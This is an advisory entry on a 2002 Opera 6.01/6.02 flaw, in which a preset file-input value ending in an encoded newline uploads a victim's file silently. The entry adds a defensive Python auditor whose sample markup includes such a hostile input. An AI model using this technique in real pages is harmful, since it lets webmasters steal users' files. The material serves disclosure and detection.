Vendor: Opera
By: SecurityFocus
CVSS: 7.5 (HIGH)
File Upload Vulnerability
CWE: 264
Product Name: Opera
Affected Version From: 06.01
Affected Version To: 06.02
Patch Exists: NO
Related CWE: N/A
CPE: opera:6.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002
Opera 6.01/6.02 File Upload Vulnerability
A vulnerability has been reported in Opera 6.01/6.02. It concerns the handling of the 'file' HTML input type. A server can set the file value while fooling Opera into thinking that no file has been specified. This is possible if the filename is appended with the string "&#10;". This HTML-encoded newline character causes the browser to believe that no value has been set. Consequently, the form is submitted and the specified file is uploaded to the server. This may occur without the knowledge or consent of the victim user. Exploitation of this vulnerability allows malicious webmasters to obtain arbitrary files from client systems.
Mitigation:
Ensure that the server-side application validates the file name before accepting the file.
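
A content filter or page audit can flag the condition the description relies on: a file input that arrives with a `value` already set, in particular one ending in an encoded newline. The following is an added example, not code from the advisory or from Opera; the sample form, the placeholder path and the names `FileInputAuditor` and `audit` are constructed for illustration.

```python
from html.parser import HTMLParser

# Constructed sample markup: one ordinary file input, one with a preset value
# ending in the HTML-encoded newline, and one unrelated text input.
SAMPLE = r'''<form method="post" enctype="multipart/form-data" action="/upload">
<input type="file" name="avatar">
<input type="file" name="doc" value="C:\example\placeholder.txt&#10;">
<input type="text" name="note" value="hello">
</form>'''


class FileInputAuditor(HTMLParser):
    """Collects <input type="file"> elements that carry a preset value."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        # Attribute names arrive lowercased; valueless attributes are None.
        a = {k: (v or "") for k, v in attrs}
        if a.get("type", "").strip().lower() != "file":
            return
        value = a.get("value", "")
        if not value:
            return  # expected case: markup leaves the file choice to the user
        self.findings.append({
            "name": a.get("name", ""),
            "value": value,
            # html.parser has already decoded &#10; / &#13; into real
            # characters, so the check is on the decoded attribute value.
            "trailing_newline": value != value.rstrip("\r\n"),
        })


def audit(html_text):
    """Return one finding per file input whose value is set by the page."""
    parser = FileInputAuditor()
    parser.feed(html_text)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```
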